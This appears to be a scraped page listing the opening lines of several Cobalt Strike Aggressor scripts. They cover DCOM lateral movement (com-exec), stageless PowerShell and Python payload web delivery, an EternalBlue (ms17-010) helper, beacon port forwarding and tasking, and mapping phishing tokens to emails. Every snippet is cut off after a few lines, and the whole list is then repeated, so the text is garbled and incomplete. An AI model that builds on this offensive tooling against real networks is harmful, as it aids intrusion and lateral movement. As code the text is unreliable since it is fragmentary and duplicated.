Raphael rsmudge

## portfwd.cna
#
# port foreward alias in Beacon and SSH
#

# pull common code into a function
sub _portfwd {
	if ($2 eq "stop") {
		btask($1, "Tasked session to stop forward to $3");
		call("beacons.pivot_stop_port", $null, $3);
	}

## comexec.cna
# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
	"Synopsis: com-exec [target] [listener]\n\n" .
	"Run a payload on a target via DCOM MMC20.Application Object");

# here's our alias to collect our arguments
alias com-exec {

## stagelessweb.cna
# Scripted Web Delivery (Stageless)
#
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.

# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
	local('%options $script $url $arch');
	%options = $3;

	# get the arch right.

## tokenToEmail.cna
#
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
#
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html
#

# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
	local('$out $now $method $uri $addr $ua $response $size $handler $when $params');

## stagelesspython.cna
# Python Stageless Scripted Web Delivery

# setup our stageless Python Web Delivery attack
sub setup_attack {
	local('%options $x86payload $x64payload $url $script');
	%options = $3;

	# generate our stageless x86 payload
	artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
	yield;

## eternalblue.cna
#
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
#

# target, listener, where to save .rc file
sub generate_rc_file {
	local('$target $listener $where $handle $shellcode');
	($target, $listener, $where) = @_;

## safedelete.cna
#
# safe delete in file browser right-click menu
#
popup_clear("filebrowser");

popup filebrowser {
	item "&Download" {
		local('$file');
		foreach $file ($3) {
			bdownload($1, "$2 $+ \\ $+ $file");

## mouse.cna
# demonstrate how to add a popup handler to a Swing component in Sleep

import java.awt.*;

import javax.swing.*;
import javax.swing.event.*;

# safely add a listener to show a popup
sub setupPopupMenu {
	# we're using fork({}) to run this in a separate Aggressor Script environment.

## initial.cna
#
# Demonstrate how to queue tasks to execute with each checkin...
#

#
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it will resume after where it last yielded.
#
sub stuffToDo {
	# Tasks for first checkin

## callany.cna
import aggressor.windows.BeaconConsole;
import java.awt.event.ActionEvent;

# $1 = beacon ID
# $2 = command + args to run [as if you typed it in the console]
sub beacon_input_command {
        local('$event');

        # we make the console a static var because each console we create subscribes to a bunch of stuff
        # and requires a manual step [normally performed by a Window close event] to clean up these things.
	#
	# port foreward alias in Beacon and SSH
	#

	# pull common code into a function
	sub _portfwd {
	if ($2 eq "stop") {
	btask($1, "Tasked session to stop forward to $3");
	call("beacons.pivot_stop_port", $null, $3);
	}
	# Lateral Movement alias
	# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

	# register help for our alias
	beacon_command_register("com-exec", "lateral movement with DCOM",
	"Synopsis: com-exec [target] [listener]\n\n" .
	"Run a payload on a target via DCOM MMC20.Application Object");

	# here's our alias to collect our arguments
	alias com-exec {
	# Scripted Web Delivery (Stageless)
	#
	# This script demonstrates some of the new APIs in Cobalt Strike 3.7.

	# setup our stageless PowerShell Web Delivery attack
	sub setup_attack {
	local('%options $script $url $arch');
	%options = $3;

	# get the arch right.
	#
	# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
	# resolve the id var (token) to an email
	#
	# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html
	#

	# method, uri, addr, ua, response, size, handler, when
	set WEB_HIT {
	local('$out $now $method $uri $addr $ua $response $size $handler $when $params');
	# Python Stageless Scripted Web Delivery

	# setup our stageless Python Web Delivery attack
	sub setup_attack {
	local('%options $x86payload $x64payload $url $script');
	%options = $3;

	# generate our stageless x86 payload
	artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
	yield;
	#
	# script to help move around with ms17-010 from Metasploit
	# Go to Attacks -> Eternal Blue
	#

	# target, listener, where to save .rc file
	sub generate_rc_file {
	local('$target $listener $where $handle $shellcode');
	($target, $listener, $where) = @_;
	#
	# safe delete in file browser right-click menu
	#
	popup_clear("filebrowser");

	popup filebrowser {
	item "&Download" {
	local('$file');
	foreach $file ($3) {
	bdownload($1, "$2 $+ \\ $+ $file");
	# demonstrate how to add a popup handler to a Swing component in Sleep

	import java.awt.*;

	import javax.swing.*;
	import javax.swing.event.*;

	# safely add a listener to show a popup
	sub setupPopupMenu {
	# we're using fork({}) to run this in a separate Aggressor Script environment.
	#
	# Demonstrate how to queue tasks to execute with each checkin...
	#

	#
	# yield tells a function to pause and return a value. The next time the same instance of the
	# function is called, it will resume after where it last yielded.
	#
	sub stuffToDo {
	# Tasks for first checkin
	import aggressor.windows.BeaconConsole;
	import java.awt.event.ActionEvent;

	# $1 = beacon ID
	# $2 = command + args to run [as if you typed it in the console]
	sub beacon_input_command {
	local('$event');

	# we make the console a static var because each console we create subscribes to a bunch of stuff
	# and requires a manual step [normally performed by a Window close event] to clean up these things.